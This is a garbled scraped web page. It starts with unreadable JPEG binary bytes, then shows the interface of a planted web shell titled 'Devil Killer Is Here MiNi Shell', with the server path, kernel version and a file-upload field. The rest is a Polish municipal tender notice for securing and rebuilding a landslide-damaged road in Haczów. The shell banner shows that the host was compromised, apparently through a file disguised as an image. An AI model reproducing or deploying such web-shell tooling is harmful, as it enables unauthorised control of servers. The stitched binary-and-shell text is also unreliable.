JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/197164-N-2014.html

<p class="kh_header"><b>Haczów: Zabezpieczenie,  remont   i  odbudowa    drogi  zlokalizowanej  na dz.  nr  ewid. 2267 w  m. Haczów w  km 0+000 do 0+248    uszkodzonej  w  wyniku   odmłodzenia  się w 2010 r.  osuwiska- etap I</b><br>
<b>Numer ogłoszenia: 197164 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabezpieczenie,  remont   i  odbudowa    drogi  zlokalizowanej  na dz.  nr  ewid. 2267 w  m. Haczów w  km 0+000 do 0+248    uszkodzonej  w  wyniku   odmłodzenia  się w 2010 r.  osuwiska- etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zabezpieczenie,  remont   i  odbudowa    drogi  zlokalizowanej  na dz.  nr  ewid. 2267 w  m. Haczów w  km 0+000 do 0+248    uszkodzonej  w  wyniku   odmłodzenia  się w 2010 r.  osuwiska - etap I. 
Celem przedsięwzięcia  jest  zabezpieczenie drogi  gminnej zlokalizowanej na działce 2267 oraz zabezpieczenie  odmłodzonego w 2010 roku osuwiska na działkach przyległych. Prace te pozwolą na utrzymanie ciągłości ruchu na drodze gminnej a tak że zabezpieczenie terenu przed dalszym uszkodzeniami wynikłymi z postępu zjawisk osuwiskowych. 
 Przedmiotowa inwestycja położona jest w województwie podkarpackim na terenie powiatu brzozowskiego, w obrębie gminy Haczów.  
 W stanie istniejącym na działce nr 2267 funkcjonuje nie normatywna droga gminna wewnętrzna. Ze względu na odmłodzenie si ę w 2010 r. osuwiska jej stan coraz bardziej si ę pogarsza, pozostawienie obecnego stanu rzeczy zagraża bezpiecznemu korzystających z niej uczestników ruchu..  Zakres  prac przewidziany  do  realizacji:
I. Wymagania  ogólne: 
1.Koszt dostosowania się do wymagań Warunków Kontraktu i Wymagań Ogólnych zawartych w Specyfikacji Technicznej DM 00.00.00
Ponadto w pozycji należy ująć koszty wykonania i rozbiórki dojazdów do miejsc wykonywania robót oraz wszelkich innych kosztów z tym związanych ( w tym transport ponadnormatywny po drogach publicznych) poza zakresem inwestycji oznaczonym na Planie Zagospodarowania.
2. Koszty wykonania zabezpieczeń tymczasowych i docelowych lub przebudów wszystkich obiektów,  urządzeń, sieci uzbrojenia terenu w rejonie objętym inwestycją i robotami związanymi transportem sprzętu zgodnie z warunkami wydanymi przez ich właścicieli lub administratorów. Koszty wykonania plomb monitorowania stanu budynków w rejonie inwestycji. Wycena obejmuje komplet robót wraz z doprowadzeniem terenu do stanu pierwotnego wraz z  kosztem nadzorów ze strony właścicieli urządzeń oraz koszt ubezpieczenia inwestycji na wypadek zniszczeń wynikłych podczas realizacji robót lub w przypadku braku należytego ubezpieczenia kosztów odszkodowań wynikających z zajęć terenu i dok. szkód w składnikach majątkowych.
3. Opracowanie projektu organizacji ruchu na czas prowadzenia robót; 1 kpl. 
4.Wprowadzenie organizacji ruchu i utrzymywanie oznakowania w czasie trwania robót :  1  kpl. 
5. Kompletna  dokumentacja  powykonawcza w  skład  której  wejdzie:
Inwentaryzacja  geodezyjna  powykonawcza, atesty, certyfikaty  , deklaracje  zgodności. : 1  kpl.
II. Roboty  przygotowawcze:
1.Wyznaczenie trasy i punktów wysokościowych w terenie pagórkowatym lub górskim - 1  km
2,. Wyznaczenie punktów charakterystycznych związanych z wytyczeniem pali i punktów charakterystycznych oczepów: 150*5.1000- 0,75
3. Wyznaczenie krawędzi spodu skarpy nasypu drogowego:1*250.1000 =- 0,25 
4. Zdjęcie warstwy humusu lub (i) darniny o grubości warstwy do 20cm do późniejszego wykorzystania - 1112,8 m2
6. Karczowanie krzaków i podszycia ilość sztuk krzaków 3000. ha - 0,29  ha
7. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 16-25cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa - 19  szt. 
8. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 26-35cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 8  szt. 
9.Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 36-45cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 18  szt.
10. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 46-55cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 30  szt.
11. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 56-65cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa - 19 szt.
12.Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 66-75cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 16  szt.
13. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 76-100cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 18  szt.
14. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi 101-130cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 14  szt.
15. Ścinanie drzew w warunkach utrudnionych (ścinanie częściami lub etapami przy użyciu podnośnika montażowego), fi powyżej130cm wraz z wywiezieniem dłużyc i gałęzi na odległość do 2km w miejsce wskazane przez właścicieli nieruchomości na których rosną drzewa  - 24 szt.
III .Roboty  ziemne:
1.Wykonanie wykopów w gruntach kategorii I-V z transportem urobku na odkład/nasyp na odl. do 6km + 2% na schodkowanie skarp - 847,72 m3
2. Wykonanie nasypów mechanicznie z gruntów kategorii I-VI z uzyskanego z wykopu z transportem gruntu z odkładu: 211,93 m3
3. Wykonanie nasypów w gruntach kategorii I-III pozyskaniem i transportem gruntu z odl. . ponad 15km (suma x 1,1) - 1407,64 m3
IV. Podbudowy
1.Wykonanie pod płyty drogowe platform roboczych podbudowy z tłucznia kamiennego, gr. w-wy 50cm po zagęszczeniu - 50% do odzysku - 719,55 m2
V. Nawierzchnie
1.Wykonanie nawierzchni z płyt drogowych pełnych gr. 20cm - nawierzchnie platform roboczych z wypełnieniem wolnych przestrzeni betonem - materiał Wykonawcy z założeniem 50% odzysku - 492,00 m2
VI. Roboty  wykończeniowe
1. Ręczne plantowanie skarp i dna wykopów oraz korony nasypów w gruntach kat. I III - 909,00 m2
2.Umocnienie skarp przez obsianie - wykonanie hydroobsiewu- 909 00 m2
3. Humusowanie z obsianiem skarp przy grubości humusu 5cm - humus z odkładu - 909,00 m2
VII. Inne  roboty
1.Wykonanie pali żelbetowych o śr. 800mmz betonu C20.25 typu CFA wraz ze zbrojeniem kształtownikiem HEB 200mm wraz z przygotowaniem i demontażem tymczasowych stanowisk dla maszyn i urządzeń - 720 m
2.Zwiększona ilość betonu w związku z wykonywaniem w gruncie pali żelbetowych o śr. 800mmz betonu C20/25 typu CFA - 144,69 m3
3. Wykonanie kotew gruntowych iniekcyjnych L=15m wraz z wykonaniem i montażem podłużnego wzmocnienia z CE 260 i iniekcją- 465,00 m
VIII.  Fundamenty
1.Wykonanie ścianki szczelnej z grodzic stalowych - na wodzie - ścianki G62 dla wykonania zabezpieczenia stanowisk roboczych i dróg technologicznych. Ścianki Wykonawcy robót do odzysku w całości -984 m2
2.Wykonanie żelbetowego oczepu na długości  pali z betonu kl. C20.25 wraz z deskowaniem i zbrojeniem stalą klasy A-IIIN oraz wykonaniem dylatacji pomiędzy segmentami oczepów - 100,44 m3
 Szczegółowe dane  dotyczące obmiarów, zakresu prac  znajdują się w  przedmiarze robót dołączonym  do niniejszej SIWZ.
3. Do w.w prac niezależnie  od zakresu  robót objętego przedmiarem  , wynagrodzenie  ustalone będzie w formie  ryczałtowej, niezmiennie  do dnia  zakończenia realizacji  zamówienia  publicznego i  ma  zawierać ponadto wszelkie  koszty  związane z:
 - urządzeniem zaplecza budowy,
 - zabezpieczeniem robót pod względem  BHP,
-doprowadzeniem terenu po  wykonaniu  robót do  stanu  pierwotnego, 
- usuwaniem  kolizji z urządzeniami podziemnymi wynikłych  przy  realizacji  projektu,
- wyłączeniem z  ruchu ciągów  pieszych i  jezdnych,
- organizacją  placu  budowy,
- naprawą  nie  zainwentaryzowanych urządzeń podziemnych,
- powstałymi podczas  wykonywania robót  innymi  okolicznościami  nie  przewidzianymi  przez  Wykonawcę,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.00.00.00-8, 45.22.00.00-5, 45.24.00.00-1, 45.24.60.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający   żąda wniesienia wadium 
 a) Wysokość wadium: Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 25.000, złotych, słownie: dwadzieścia pięć tysięcy złotych 00/100 
b)Termin wniesienia wadium: Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
- wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert. 
- wnoszone w pozostałych formach oryginały dokumentów zostały złożone w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. nr  5 przed upływem terminu składania ofert. Dokument potwierdzający wniesienie wadium należy dołączyć do oferty, przy czym:  wadium w formie pieniądza należy wnieść na rachunek bankowy Zamawiającego - Podkarpacki Bank Spółdzielczy w  Sanoku  o/Haczów nr 68864210702007700007490004 ,  w przypadku wniesienia wadium w formie innej niż pieniądz do oferty należy załączyć kserokopię dokumentu stanowiącego wadium. Oryginał tego dokumentu należy złożyć w kasie Zamawiającego w budynku Urzędu Gminy w Haczowie, w pok. Nr 5 przed upływem terminu składania ofert.
c) Wadium  może  być  wnoszone  w jednej  lub kilku następujących  formach:
- pieniądzu 
- poręczeniach  bankowych  lub poręczeniach  spółdzielczej kasy  oszczędnościowo-kredytowej, z tym ze  poręczenie kasy  jest zawsze poręczeniem pieniężnym
- gwarancjach  bankowych
- gwarancjach  ubezpieczeniowych
- poręczeniach  udzielanych  przez podmioty  o których  mowa  w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, z póź. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny  spełniania w/w warunku niezbędne są:
a) Dokument potwierdzający  posiadanie  uprawnień  do  wykonywania określonej  działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich  posiadania , w szczególności  koncesji  , zezwolenia  lub  licencji.  Jeżeli wykonawca  ma siedzibę  lub miejsce  zamieszkania  poza terytorium Rzeczypospolitej Polskiej , zamiast w/w  dokumentu składa  dokument  lub  dokumenty   wystawione  w  kraju , w  którym  ma miejsce  zamieszkania  lub  siedzibę , potwierdzające odpowiednio, że posiada  uprawnienia do  wykonywania  działalności  związanej  z  przedmiotem  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
 a) wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 robót budowlanych polegających na  wykonaniu prac  w zakresie zbieżnym z  niniejszym postępowaniem.  ( zabezpieczanie,  remont  dróg  uszkodzonych  w  wyniku  działania  osuwisk)
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
wykaz robót  budowlanych wykonanych  w okresie  ostatnich pięciu lat  przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  rodzaju i wartości , daty i miejsca  wykonania oraz załączeniem dowodów, dokumentów potwierdzających ukończenie  i  wykonanie z  należytą  starannością robót  wymienionych  w  wykazie  robót. 
  W przypadku gdy zamawiający jest podmiotem  na rzecz którego  roboty  budowlane   wskazane w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym  do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia.		
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   robót  budowlanych   w celu wykonania zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia 		
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie  robotami  budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:
a) wykonawca posiada (dysponuje) na rachunku bankowym środkami pieniężnymi (lub posiada zdolność kredytową) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków   udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

